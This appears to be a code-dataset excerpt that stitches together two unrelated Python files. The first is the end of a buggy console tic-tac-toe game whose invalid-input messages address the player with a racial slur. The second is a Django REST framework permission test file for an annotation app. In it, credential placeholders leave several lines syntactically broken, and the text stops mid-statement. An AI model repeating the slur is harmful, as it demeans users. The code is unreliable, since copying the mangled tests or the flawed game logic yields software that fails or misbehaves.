playAgain()
elif theBoard['1'] == theBoard['4'] == theBoard['7'] != ' ': # down the left side
d = theBoard['1']
print("\nGame Over.\n")
print(" **** " + d + " won. ****")
playAgain()
elif theBoard['2'] == theBoard['5'] == theBoard['8'] != ' ': # down the middle
e = theBoard['2']
print("\nGame Over.\n")
print(" **** " + e + " won. ****")
playAgain()
elif theBoard['3'] == theBoard['6'] == theBoard['9'] != ' ': # down the right side
f = theBoard['3']
print("\nGame Over.\n")
print(" **** " + f + " won. ****")
playAgain()
elif theBoard['7'] == theBoard['5'] == theBoard['3'] != ' ': # diagonal
g = theBoard['7']
print("\nGame Over.\n")
print(" **** " + g + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['5'] == theBoard['9'] != ' ': # diagonal
h = theBoard['1']
print("\nGame Over.\n")
print(" **** " + h + " won. ****")
playAgain()
else:
print("Draw the match")
playAgain()
def printboard():
print(theBoard["1"], theBoard["2"], theBoard["3"])
print(theBoard["4"], theBoard["5"], theBoard["6"])
print(theBoard["7"], theBoard["8"], theBoard["9"])
def gamePlay():
"""------------------------------------------------------------------------------------------------------------------"""
print("Inorder to play this game , \n Enter the position you want to place X and O respectively")
printboard()
# firstMove
xMove = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(1)
oMove = str(input("hey O, Enter a position:\n").upper())
theBoard.update({oMove: "O"})
gamecheck(1)
printboard()
gamecheck(1)
count = 1
"""------------------------------------------------------------------------------------------------------------------"""
# second Move
xmove1 = xMove
omove1 = oMove
print("Positions are taken", xmove1, omove1)
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
if omove1 != oMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
else:
print("choose some other positions", xmove1, "and", omove1, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
count = 2
"""------------------------------------------------------------------------------------------------------------------"""
# third Move
xmove2 = xMove
omove2 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
if omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(3)
theBoard.update({oMove: "O"})
gamecheck(3)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
gamecheck(3)
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(3)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
gamecheck(3)
count = 3
"""------------------------------------------------------------------------------------------------------------------"""
# Fourth Move
xmove3 = xMove
omove3 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, omove3, xmove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(4)
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(4)
theBoard.update({oMove: "O"})
gamecheck(4)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
gamecheck(4)
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(4)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
count = 4
"""------------------------------------------------------------------------------------------------------------------"""
# fifth_move
count = 5
xmove = str(input("hey X,Enter a position:\n").upper())
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xmove: "X"})
gamecheck(5)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
xmove4 = str(input("hey X,Enter a position").upper())
theBoard.update({xmove4: "X"})
gamecheck(5)
printboard()
def playAgain():
print("Do you want to play again ?\n")
print("yes or no ")
sol = str(input("Enter yes or no:\n").upper())
count = 0
if sol == "YES":
count = 0
gamePlayagain()
else:
exit()
def boardReset():
theBoard.update({"1": '1'})
theBoard.update({"2": '2'})
theBoard.update({"3": '3'})
theBoard.update({"4": '4'})
theBoard.update({"5": '5'})
theBoard.update({"6": '6'})
theBoard.update({"7": '7'})
theBoard.update({"8": '8'})
theBoard.update({"9": '9'})
def gamePlayagain():
"""------------------------------------------------------------------------------------------------------------------"""
print(
"Inorder to play this game again once more , \n Enter the position you want to place X and O respectively")
boardReset()
printboard()
# firstMove
xMove = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(1)
oMove = str(input("hey O, Enter a position:\n").upper())
theBoard.update({oMove: "O"})
gamecheck(1)
printboard()
gamecheck(1)
count = 1
"""------------------------------------------------------------------------------------------------------------------"""
# second Move
xmove1 = xMove
omove1 = oMove
print("Positions are taken", xmove1, omove1)
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
if omove1 != oMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
else:
print("choose some other positions", xmove1, "and", omove1, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
count = 2
"""------------------------------------------------------------------------------------------------------------------"""
# third Move
xmove2 = xMove
omove2 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
if omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(3)
theBoard.update({oMove: "O"})
gamecheck(3)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
gamecheck(3)
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(3)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
gamecheck(3)
count = 3
"""------------------------------------------------------------------------------------------------------------------"""
# Fourth Move
xmove3 = xMove
omove3 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, omove3, xmove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(4)
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(4)
theBoard.update({oMove: "O"})
gamecheck(4)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
gamecheck(4)
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(4)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
count = 4
"""------------------------------------------------------------------------------------------------------------------"""
# fifth_move
count = 5
xmove = str(input("hey X,Enter a position:\n").upper())
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xmove: "X"})
gamecheck(5)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
xmove4 = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xmove4: "X"})
gamecheck(5)
printboard()
gamePlay()
def HumanvsComputer():
import random
print("Now playing HUMAN vs Computer Tic Tac Toe")
theBoard = {"1": '1', "2": '2', "3": '3',
"4": '4', "5": '5', "6": '6',
"7": '7', "8": '8', "9": '9'}
def gamecheck(count):
if count < 5:
if theBoard['7'] == theBoard['8'] == theBoard['9'] != ' ': # across the top
a = theBoard['7']
printboard()
print("bottom ")
print("\nGame Over.\n")
print(" **** " + a + " won. ****")
playAgain()
elif theBoard['4'] == theBoard['5'] == theBoard['6'] != ' ': # across the middle
b = theBoard['4']
printboard()
print("across the middle")
print("\nGame Over.\n")
print(" **** " + b + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['2'] == theBoard['3'] != ' ': # across the bottom
c = theBoard['1']
printboard()
print("top line")
print("\nGame Over.\n")
print(" **** " + c + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['4'] == theBoard['7'] != ' ': # down the left side
d = theBoard['1']
printboard()
print("left side")
print("\nGame Over.\n")
print(" **** " + d + " won. ****")
playAgain()
elif theBoard['2'] == theBoard['5'] == theBoard['8'] != ' ': # down the middle
e = theBoard['2']
printboard()
print("down the middle")
print("\nGame Over.\n")
print(" **** " + e + " won. ****")
playAgain()
elif theBoard['3'] == theBoard['6'] == theBoard['9'] != ' ': # down the right side
f = theBoard['3']
printboard()
print("down the right side")
print("\nGame Over.\n")
print(" **** " + f + " won. ****")
playAgain()
elif theBoard['7'] == theBoard['5'] == theBoard['3'] != ' ': # diagonal
g = theBoard['7']
printboard()
print("diagonal")
print("\nGame Over.\n")
print(" **** " + g + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['5'] == theBoard['9'] != ' ': # diagonal
h = theBoard['1']
printboard()
print("diagonal")
print("\nGame Over.\n")
print(" **** " + h + " won. ****")
playAgain()
else:
printboard()
print("Draw the match")
playAgain()
def printboard():
print(theBoard["1"], theBoard["2"], theBoard["3"])
print(theBoard["4"], theBoard["5"], theBoard["6"])
print(theBoard["7"], theBoard["8"], theBoard["9"])
def gamePlay():
"""------------------------------------------------------------------------------------------------------------------"""
print("Inorder to play this game , \n Enter the position you want to place X and O respectively")
printboard()
# firstMove
move_list = ["1", "2", "3", "4", "5", "6", "7", "8", "9"]
xMove = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(1)
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
theBoard.update({oMove: "O"})
move_list.remove(oMove)
gamecheck(1)
printboard()
gamecheck(1)
count = 1
"""------------------------------------------------------------------------------------------------------------------"""
# second Move
xmove1 = xMove
omove1 = oMove
print("Positions are taken", xmove1, omove1)
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
if omove1 != oMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
else:
print("choose some other positions", xmove1, "and", omove1, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(xMove)
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
count = 2
"""------------------------------------------------------------------------------------------------------------------"""
# third Move
xmove2 = xMove
omove2 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
if omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(3)
theBoard.update({oMove: "O"})
gamecheck(3)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
gamecheck(3)
oMove = random_num = random.choice(move_list)
move_list.remove(xMove)
gamecheck(3)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
gamecheck(3)
count = 3
"""------------------------------------------------------------------------------------------------------------------"""
# Fourth Move
xmove3 = xMove
omove3 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, omove3, xmove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
gamecheck(4)
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(4)
theBoard.update({oMove: "O"})
gamecheck(4)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
gamecheck(4)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
gamecheck(4)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
count = 4
"""------------------------------------------------------------------------------------------------------------------"""
# fifth_move
count = 5
xmove = str(input("hey X,Enter a position:\n").upper())
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xmove: "X"})
gamecheck(5)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
xmove4 = str(input("hey X,Enter a position").upper())
theBoard.update({xmove4: "X"})
gamecheck(5)
printboard()
def playAgain():
print("Do you want to play again ?\n")
print("yes or no ")
sol = str(input("Enter yes or no:\n").upper())
count = 0
if sol == "YES":
count = 0
gamePlayagain()
else:
exit()
def boardReset():
theBoard.update({"1": '1'})
theBoard.update({"2": '2'})
theBoard.update({"3": '3'})
theBoard.update({"4": '4'})
theBoard.update({"5": '5'})
theBoard.update({"6": '6'})
theBoard.update({"7": '7'})
theBoard.update({"8": '8'})
theBoard.update({"9": '9'})
def gamePlayagain():
"""------------------------------------------------------------------------------------------------------------------"""
print(
"Inorder to play this game again once more , \n Enter the position you want to place X and O respectively")
boardReset()
printboard()
# firstMove
move_list = ["1", "2", "3", "4", "5", "6", "7", "8", "9"]
xMove = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(1)
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
theBoard.update({oMove: "O"})
move_list.remove(oMove)
gamecheck(1)
printboard()
gamecheck(1)
count = 1
"""------------------------------------------------------------------------------------------------------------------"""
# second Move
xmove1 = xMove
omove1 = oMove
print("Positions are taken", xmove1, omove1)
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
if omove1 != oMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
else:
print("choose some other positions", xmove1, "and", omove1, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(xMove)
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
count = 2
"""------------------------------------------------------------------------------------------------------------------"""
# third Move
xmove2 = xMove
omove2 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
if omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(3)
theBoard.update({oMove: "O"})
gamecheck(3)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
gamecheck(3)
oMove = random_num = random.choice(move_list)
move_list.remove(xMove)
gamecheck(3)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
gamecheck(3)
count = 3
"""------------------------------------------------------------------------------------------------------------------"""
# Fourth Move
xmove3 = xMove
omove3 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, omove3, xmove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
gamecheck(4)
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(4)
theBoard.update({oMove: "O"})
gamecheck(4)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
gamecheck(4)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
gamecheck(4)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
count = 4
"""------------------------------------------------------------------------------------------------------------------"""
# fifth_move
count = 5
xmove = str(input("hey X,Enter a position:\n").upper())
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xmove: "X"})
gamecheck(5)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
xmove4 = str(input("hey X,Enter a position").upper())
theBoard.update({xmove4: "X"})
gamecheck(5)
printboard()
gamePlay()
if mode=="HUMAN":
HumanvsHuman()
elif mode=="COMPUTER":
HumanvsComputer()
else:
print(" hey Nigga, enter a valid Option!!")
mode = str(input("type - 'Human' or 'computer' ").upper())
if mode == "HUMAN":
HumanvsHuman()
elif mode == "COMPUTER":
HumanvsComputer()
else:
print(" hey Nigga, Get lost!!")
exit()
| StarcoderdataPython |
129232 | import os
from django.conf import settings
from django.test import override_settings
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase
from model_mommy import mommy
from ..models import User, SequenceAnnotation, Document, Role, RoleMapping
from ..models import DOCUMENT_CLASSIFICATION, SEQUENCE_LABELING, SEQ2SEQ, SPEECH2TEXT
from ..utils import PlainTextParser, CoNLLParser, JSONParser, CSVParser, FastTextParser
from ..exceptions import FileParseException
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
def create_default_roles():
Role.objects.get_or_create(name=settings.ROLE_PROJECT_ADMIN)
Role.objects.get_or_create(name=settings.ROLE_ANNOTATOR)
Role.objects.get_or_create(name=settings.ROLE_ANNOTATION_APPROVER)
def assign_user_to_role(project_member, project, role_name):
role, _ = Role.objects.get_or_create(name=role_name)
RoleMapping.objects.get_or_create(role_id=role.id, user_id=project_member.id, project_id=project.id)
def remove_all_role_mappings():
RoleMapping.objects.all().delete()
class TestHealthEndpoint(APITestCase):
@classmethod
def setUpTestData(cls):
cls.url = reverse(viewname='health')
def test_returns_green_status_on_health_endpoint(self):
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['status'], 'green')
class TestUtilsMixin:
def _patch_project(self, project, attribute, value):
old_value = getattr(project, attribute, None)
setattr(project, attribute, value)
project.save()
def cleanup_project():
setattr(project, attribute, old_value)
project.save()
self.addCleanup(cleanup_project)
@override_settings(STATICFILES_STORAGE='django.contrib.staticfiles.storage.StaticFilesStorage')
class TestProjectListAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.main_project_member_name = 'project_member_name'
cls.main_project_member_pass = '<PASSWORD>'
cls.sub_project_member_name = 'sub_project_member_name'
cls.sub_project_member_pass = '<PASSWORD>'
cls.approver_name = 'approver_name_name'
cls.approver_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
main_project_member = User.objects.create_user(username=cls.main_project_member_name,
password=<PASSWORD>)
sub_project_member = User.objects.create_user(username=cls.sub_project_member_name,
password=<PASSWORD>)
approver = User.objects.create_user(username=cls.approver_name,
password=<PASSWORD>)
User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.main_project = mommy.make('TextClassificationProject', users=[main_project_member])
cls.sub_project = mommy.make('TextClassificationProject', users=[sub_project_member])
assign_user_to_role(project_member=main_project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=sub_project_member, project=cls.sub_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=approver, project=cls.main_project,
role_name=settings.ROLE_ANNOTATION_APPROVER)
cls.url = reverse(viewname='project_list')
cls.data = {'name': 'example', 'project_type': 'DocumentClassification',
'description': 'example', 'guideline': 'example',
'resourcetype': 'TextClassificationProject'}
cls.num_project = main_project_member.projects.count()
def test_returns_main_project_to_approver(self):
self.client.login(username=self.approver_name,
password=self.approver_pass)
response = self.client.get(self.url, format='json')
project = response.data[0]
num_project = len(response.data)
self.assertEqual(num_project, self.num_project)
self.assertEqual(project['id'], self.main_project.id)
def test_returns_main_project_to_main_project_member(self):
self.client.login(username=self.main_project_member_name,
password=<PASSWORD>.main_project_member_<PASSWORD>)
response = self.client.get(self.url, format='json')
project = response.data[0]
num_project = len(response.data)
self.assertEqual(num_project, self.num_project)
self.assertEqual(project['id'], self.main_project.id)
def test_do_not_return_main_project_to_sub_project_member(self):
self.client.login(username=self.sub_project_member_name,
password=self.sub_project_member_pass)
response = self.client.get(self.url, format='json')
project = response.data[0]
num_project = len(response.data)
self.assertEqual(num_project, self.num_project)
self.assertNotEqual(project['id'], self.main_project.id)
def test_allows_superuser_to_create_project(self):
self.client.login(username=self.super_user_name,
password=<PASSWORD>)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertFalse(response.json().get('collaborative_annotation'))
self.assertFalse(response.json().get('randomize_document_order'))
def test_allows_superuser_to_create_project_with_flags(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
data = dict(self.data)
data['collaborative_annotation'] = True
data['randomize_document_order'] = True
response = self.client.post(self.url, format='json', data=data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(response.json().get('collaborative_annotation'))
self.assertTrue(response.json().get('randomize_document_order'))
def test_disallows_project_member_to_create_project(self):
self.client.login(username=self.main_project_member_name,
password=<PASSWORD>)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
@override_settings(STATICFILES_STORAGE='django.contrib.staticfiles.storage.StaticFilesStorage')
class TestProjectDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.admin_user_name = 'admin_user_name'
cls.admin_user_pass = '<PASSWORD>'
create_default_roles()
cls.project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
project_admin = User.objects.create_superuser(username=cls.admin_user_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.main_project = mommy.make('TextClassificationProject', users=[cls.project_member, project_admin])
mommy.make('TextClassificationProject', users=[non_project_member])
cls.url = reverse(viewname='project_detail', args=[cls.main_project.id])
cls.data = {'description': 'lorem'}
assign_user_to_role(project_member=cls.project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=project_admin, project=cls.main_project,
role_name=settings.ROLE_PROJECT_ADMIN)
def test_returns_main_project_detail_to_main_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['id'], self.main_project.id)
def test_do_not_return_main_project_to_sub_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_admin_to_update_project(self):
self.client.login(username=self.admin_user_name,
password=self.admin_user_pass)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.data['description'], self.data['description'])
def test_disallows_non_project_member_to_update_project(self):
self.client.login(username=self.non_project_member_name,
password=<PASSWORD>)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_admin_to_delete_project(self):
self.client.login(username=self.admin_user_name,
password=self.<PASSWORD>)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_non_project_member_to_delete_project(self):
self.client.login(username=self.non_project_member_name,
password=<PASSWORD>)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestLabelListAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.admin_user_name = 'admin_user_name'
cls.admin_user_pass = '<PASSWORD>'
create_default_roles()
cls.project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=<PASSWORD>)
project_admin = User.objects.create_superuser(username=cls.admin_user_name,
password=<PASSWORD>pass,
email='<EMAIL>')
cls.main_project = mommy.make('Project', users=[cls.project_member, project_admin])
cls.main_project_label = mommy.make('Label', project=cls.main_project)
sub_project = mommy.make('Project', users=[non_project_member])
other_project = mommy.make('Project', users=[project_admin])
mommy.make('Label', project=sub_project)
cls.url = reverse(viewname='label_list', args=[cls.main_project.id])
cls.other_url = reverse(viewname='label_list', args=[other_project.id])
cls.data = {'text': 'example'}
assign_user_to_role(project_member=cls.project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
def test_returns_labels_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_do_not_return_labels_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_labels_of_other_projects(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
label = response.data[0]
num_labels = len(response.data)
self.assertEqual(num_labels, len(self.main_project.labels.all()))
self.assertEqual(label['id'], self.main_project_label.id)
def test_allows_admin_to_create_label(self):
self.client.login(username=self.admin_user_name,
password=<PASSWORD>)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_can_create_multiple_labels_without_shortcut_key(self):
self.client.login(username=self.admin_user_name,
password=self.<PASSWORD>)
labels = [
{'text': 'Ruby', 'prefix_key': None, 'suffix_key': None},
{'text': 'PHP', 'prefix_key': None, 'suffix_key': None}
]
for label in labels:
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_can_create_same_label_in_multiple_projects(self):
self.client.login(username=self.admin_user_name,
password=<PASSWORD>)
label = {'text': 'LOC', 'prefix_key': None, 'suffix_key': 'l'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
response = self.client.post(self.other_url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_can_create_same_suffix_with_different_prefix(self):
self.client.login(username=self.admin_user_name,
password=self.<PASSWORD>)
label = {'text': 'Person', 'prefix_key': None, 'suffix_key': 'p'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
label = {'text': 'Percentage', 'prefix_key': 'ctrl', 'suffix_key': 'p'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_cannot_create_same_shortcut_key(self):
self.client.login(username=self.admin_user_name,
password=self.admin_user_pass)
label = {'text': 'Person', 'prefix_key': None, 'suffix_key': 'p'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
label = {'text': 'Percentage', 'prefix_key': None, 'suffix_key': 'p'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_disallows_project_member_to_create_label(self):
self.client.login(username=self.project_member_name,
password=<PASSWORD>)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestLabelDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
User.objects.create_user(username=cls.non_project_member_name, password=cls.non_project_member_pass)
# Todo: change super_user to project_admin.
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>user_<PASSWORD>,
